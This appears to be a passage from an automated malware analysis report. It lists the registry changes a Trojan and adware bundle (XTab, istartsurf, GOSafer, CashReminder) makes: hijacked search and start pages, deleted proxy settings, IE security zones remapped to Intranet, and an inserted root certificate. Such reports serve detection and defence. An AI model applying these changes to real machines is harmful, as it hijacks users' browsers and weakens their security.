"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 24 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\IHProtect]
"ptid" = "pcm"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process XTab_Setup2121.exe:3372 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"(Default)" = "%Program Files%\XTab\SupTab.dll"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\HELPDIR]
"(Default)" = "%Program Files%\XTab"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"DisplayName" = "Google"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"TopResultURL" = "http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IETR02"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0]
"(Default)" = "SupTabLib"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURL" = "http://www.bing.com/favicon.ico"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}\1.0\0\win32]
"(Default)" = "%Program Files%\XTab\SupTab.dll"
[HKLM\SOFTWARE\SupDp]
"dir" = "%Program Files%\XTab"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}]
"(Default)" = "IIETabPage"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}]
"(Default)" = "IETabPage Class"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconPath" = "%Documents and Settings%\%current user%\Local Settings\Application DataLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico"
"DisplayName" = "Bing"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconURL" = "http://www.google.com/favicon.ico"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope" = "{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconURL" = "http://do-search.com//favicon.ico"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"
[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\Version]
"(Default)" = "1.0"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"FaviconPath" = "%Documents and Settings%\%current user%\Local Settings\Application DataLow\Microsoft\Internet Explorer\Services\search_{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}.ico"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 FA 39 C5 07 09 48 4F 9E 13 1F 12 D5 EF AA 55"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"TopResultURL" = "http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:{language}:{referrer:source}&ie={inputEncoding?}&oe={outputEncoding?}"
[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURLFallback" = "http://www.bing.com/favicon.ico"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"URL" = "http://do-search.com/web/?utm_source=b&utm_medium=&utm_campaign=install_ie&utm_content=ds&from=&uid=ST500DM002-1BC142_W2A27G6AXXXXW2A27G6A&ts=1420373293&type=default&q={searchTerms}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{2023ECEC-E06A-4372-A1C7-0B49F9E0FFF0}]
"DisplayName" = "e"
[HKLM\SOFTWARE\supTab]
"ptid" = "pcm"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCR\Interface\{917CAAE9-DD47-4025-936E-1414F07DF5B8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\CLSID\{3593C8B9-8E18-4B4B-B7D3-CB8BEB1AA42C}\TypeLib]
"(Default)" = "{968EDCE0-C10A-47BB-B3B6-FDF09F2A417D}"
[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E733165D-CBCF-4FDA-883E-ADEF965B476C}]
"FaviconPath" = "%Documents and Settings%\%current user%\Local Settings\Application DataLow\Microsoft\Internet Explorer\Services\search_{E733165D-CBCF-4FDA-883E-ADEF965B476C}.ico"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process wpm_v20.0.0.1953_0302.exe:3104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 8F 9B 36 34 E9 3F 9C 4D 42 38 F8 54 74 2E 1A"
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe:248 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 71 D9 11 3C CF 3D D2 F0 3B 77 4F 30 26 04 05"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"DisplayVersion" = "1.0"
"Publisher" = "GO SAFER LLC"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"UninstallString" = "%Program Files%\GOSafer\uninst.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GOSafer]
"DisplayName" = "GOSafer"
"QuietUninstallString" = "%Program Files%\GOSafer\uninst.exe"
"Comments" = "Your custom offers and deals!(qR8OYLNuOiibJ6QjgTQRjI)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\GOSafer]
"Version" = "1.0.0"
The process net.exe:2552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 35 59 43 40 22 67 9C 33 E6 7A 8E 17 B6 E8 49"
The process net.exe:1808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 95 F0 C0 7F B2 9F E0 F1 B5 66 C1 6B E0 42 DF"
The process net.exe:2556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF B4 4B F8 EC 5B C0 B2 3A A9 78 81 39 25 28 3D"
The process net.exe:400 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B4 40 79 76 4E 28 06 AD 7C 18 D5 D8 09 BF C5 41"
The process QQBrowser.exe:2908 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B E8 C2 8B 50 D8 4A DC FE 9E 2D 1B 9D 6E 3C 05"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\B934D573F69tmp\tmp]
"RegWrite.exe" = "RegWrite"
"wpm_v20.0.0.1953_0302.exe" = "Windows SysTool Service"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\B934D573F69tmp\tmp]
"XTab_Setup2121.exe" = "XTab"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process QQBrowser.exe:2216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"UninstallString" = "%Documents and Settings%\%current user%\Application Data\istartsurf\UninstallManager.exe -ptid=pcm"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
[HKLM\SOFTWARE\Clients\StartMenuInternet\VMWAREHOSTOPEN.EXE\shell\open\command]
"(Default)" = "%Program Files%\VMware\VMware Tools\VMwareHostOpen.exe http://www.istartsurf.com/?type=sc&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\istartsurfSoftware\istartsurfhp]
"Time" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main]
"Search Page" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\istartsurf uninstall]
"DisplayIcon" = "%Documents and Settings%\%current user%\Application Data\istartsurf\UninstallManager.exe"
"DisplayName" = "istartsurf uninstall"
"Publisher" = "istartsurf"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Search_URL" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"
[HKLM\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command]
"(Default)" = "%Program Files%\Internet Explorer\iexplore.exe http://www.istartsurf.com/?type=sc&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKCU\Software\Microsoft\Internet Explorer\TabbedBrowsing]
"NewTabPageShow" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Default_Page_URL" = "http://www.istartsurf.com/?type=hp&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\istartsurfSoftware\istartsurfhp]
"oem" = "pcm"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3A 1D 52 46 A8 6D 26 87 85 1B 7A 08 0C 12 09 A6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Internet Explorer\Main]
"Start Page" = "http://www.istartsurf.com/?type=hp&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Search]
"CustomizeSearch" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"
"SearchAssistant" = "http://www.istartsurf.com/web/?type=ds&ts=1429773859&from=pcm&uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&q={searchTerms}"
The process q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe:660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 99 B5 77 EB AC 96 F0 AA 66 D1 DE 39 8C 6E 8C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\CashReminder]
"Version" = "1.0.0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"Publisher" = "Related Deals LLC"
[HKLM\SOFTWARE\CashReminder]
"affid" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"UninstallString" = "%Program Files%\CashReminder\uninstall.exe /S"
[HKLM\System\CurrentControlSet\Services\CashReminder]
"Description" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices!"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayName" = "CashReminder"
"Comments" = "CashReminder will remind you when you can earn a percent of your money back shopping online and related products with lower prices! (Build: Vi8QYQCatMvm1PLT8H1tqpJtGKSso)"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CashReminder]
"DisplayVersion" = "1.0.0"
"QuietUninstallString" = "%Program Files%\CashReminder\uninstall.exe /S"
The process HPNotify.exe:3664 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 91 A0 A2 E4 C7 AD 39 4F 9C E0 63 ED 5E CA 69"
The process ActSys.exe:2648 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\System\CurrentControlSet\Services\Tcpip\Parameters]
"DisableTaskOffload" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 06 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "10 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\System\CurrentControlSet\Services\asfilterdrv]
"Tag" = "17"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA 40 06 25 78 53 38 7D 1F 3C 1E B9 70 4A 64 EF"
[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\E9C15E05782C5BADC4287A994D1DDEDB171B8B2A]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 E9 C1 5E 05"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
